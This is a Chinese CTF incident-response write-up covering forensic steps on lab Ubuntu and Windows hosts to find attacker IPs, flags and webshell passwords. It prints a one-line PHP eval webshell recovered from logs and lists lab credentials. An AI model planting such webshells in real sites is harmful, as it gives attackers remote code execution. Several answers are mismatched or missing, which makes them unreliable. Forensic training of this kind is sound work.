第二届帕鲁杯畸形的爱 部分题解

第二届帕鲁杯应急响应分支 - 畸行的爱

一、环境解压与密码

环境解压密码

1
Parloo&zgsfsys&onefox&solar**juyt

二、靶机配置修改

解压完文件后,需完成以下两项配置修改,确保靶机正常运行:

  1. 修改VMX虚拟机配置文件
    编辑每个靶机的vmx配置文件,将virtualHW.version = “21”改为17(具体版本需根据自身VMware版本调整)。
    vmx文件修改

  2. 修改NAT网络段
    “畸行的爱”共包含4台靶机,需将所有靶机的NAT网络统一改为192.168.87段。
    NAT网络修改

三、靶机整体信息

1. 单台虚拟机配置

虚拟机配置

2. 整体拓扑结构

拓扑结构

3. 靶机文件哈希信息

1
2
3
4
5
6
文件: 畸形的爱.7z
大小: 18865734297 字节
修改时间: 2025年5月2日, 15:57:47
MD5: 79DD66A3C4A90317441943D88D018987
SHA1: CC63B63C7D782BE96DC8EBEAD624F82C68D5515B
CRC32: 634F9B36

四、题目列表

序号 题目描述 答案/状态
2 攻击者IP地址1
3 攻击者IP地址2
4 暴力破解开始时间
5 flag1
6 flag2
7 flag3
8 钓鱼文件的32位大写哈希
9 webshell密码1
10 攻击者开放端口1
11 攻击者开放端口2
12 攻击者开放端口3
13 webshell密码2
14 隐藏账户的密码
15 [溯源]攻击者的邮箱
16 [溯源]flag4

五、各题目详细解析

1. 攻击者IP地址1

操作环境:Ubuntu WebServer服务器

  • 登录凭证:webserver/webserver,执行sudo -i su root可免密切换至root用户。
    Ubuntu登录

  • 排查过程:在/var/log/nginx/error.log.1日志中发现a.php后门文件记录,其内容如下:

    1
    2
    <?php eval($_POST[00232]); ?>
    <?php eval($_POST["00232"]); ?>

  • 答案:192.168.31.240

2. 攻击者IP地址2

操作环境:Windows 10系统

  • 登录凭证:密码zjl@123

  • 排查过程:进入桌面后,在“回收站”中发现异常文件简历.zip,将其上传至安恒沙箱分析,得出外联地址。
    安恒沙箱分析

  • 答案:192.168.31.11

3. 暴力破解开始时间

操作环境:Ubuntu WebServer服务器

  • 排查过程:

    1. 执行history命令,发现容器启动记录。
      容器启动记录
    2. 检查容器状态,发现容器已关闭,重启后执行docker logs phpmyadmin查看phpmyadmin日志,发现192.168.31.240的POST请求频率异常(推测为暴力破解行为)。
      phpmyadmin日志

  • 答案:192.168.31.240 (注:原解析未明确时间,暂保留此答案形式)

4. flag1

操作环境:Windows 10系统

  • 排查过程:攻击者可能通过定时任务维持权限,执行taskschd.msc打开“任务计划程序库”,在其中发现flag1。
    任务计划程序库

  • 答案:palu{pc3_zgsfqwerlkssaw}

5. flag2

操作环境:Windows 10系统

  • 排查过程:寻找flag1时,在“快速访问”中发现a.bat文件,右键编辑查看内容:

    1
    2
    3
    @echo off
    msg * "王美欣,你知道我有多爱你吗"
    echo flag2palu{nizhidaowoyouduoainima}

  • 答案:palu{nizhidaowoyouduoainima}

6. flag3

操作环境:Ubuntu WebServer服务器

  • 排查过程:在/var/www/html/index.php中发现MySQL数据库配置信息:

    1
    2
    3
    4
    define('DB_HOST', '192.168.87.102');
    define('DB_USER', 'root');
    define('DB_PASS', 'TOOR@123'); // 替换为你的数据库密码
    define('DB_NAME', 'ecommerce_order_system');

    使用该配置连接数据库后,在orders表的order_content字段中,找到Mr.chen相关数据,对其进行Base64解码得到flag3。
    数据库字段解码

  • 答案:3palu{sqlaabbccsbwindows}

7. 钓鱼文件的32位大写哈希

操作环境:Windows 10系统

  • 排查过程:在简历.zip压缩包中提取出简历.exe,计算该文件的MD5哈希值。
    MD5计算

  • 答案:2977cdab8f3ee5efddae61ad9f6cf203

8. webshell密码1

操作环境:Ubuntu WebServer服务器

  • 排查过程:

    1. /var/log/nginx/access.log.1中发现shell.php的访问记录;
    2. 执行find / -name "shell.php"定位文件路径:/var/lib/docker/overlay2/4bc4b1046f364a2489bc8a2636f6be58ae1620139c2198b10610563e4860313f/diff/var/www/html/uploads/shell.php
    3. 查看文件内容,获取webshell密码。
      shell.php内容

  • 答案:hack

9. 攻击者开放端口1

排查过程:通过安恒沙箱对简历.exe的分析结果,发现异常端口。
沙箱端口信息

  • 答案:8084

10. 攻击者开放端口2

排查过程:因虚拟机CPU指令问题,需强行关机重启(部分环境可能丢失),参考其他分析结果,发现1144端口存在连接行为。
1144端口连接

  • 答案:1144

11. 攻击者开放端口3

  • 说明:因容器环境问题,暂未完成解析,无明确答案。

12. webshell密码2

操作环境:Ubuntu WebServer服务器

  • 排查过程:在/var/log/nginx/error.log.1中发现a.php后门文件,其内容包含eval($_POST[00232]),即webshell密码。
    a.php内容

  • 答案:00232

13. 隐藏账户的密码

操作环境:Windows 10系统

  • 排查过程:执行vmic useraccount get name,SID查看用户哈希,后续解析未完成。
    用户哈希查看
    暂时就只导出了hash dbae99beb48fd9132e1cf77f4c746979
  • 说明:暂未给出解答。

14. [溯源]攻击者的邮箱

  • 说明:暂未给出解答。

15. [溯源]flag4

  • 说明:暂未给出解答。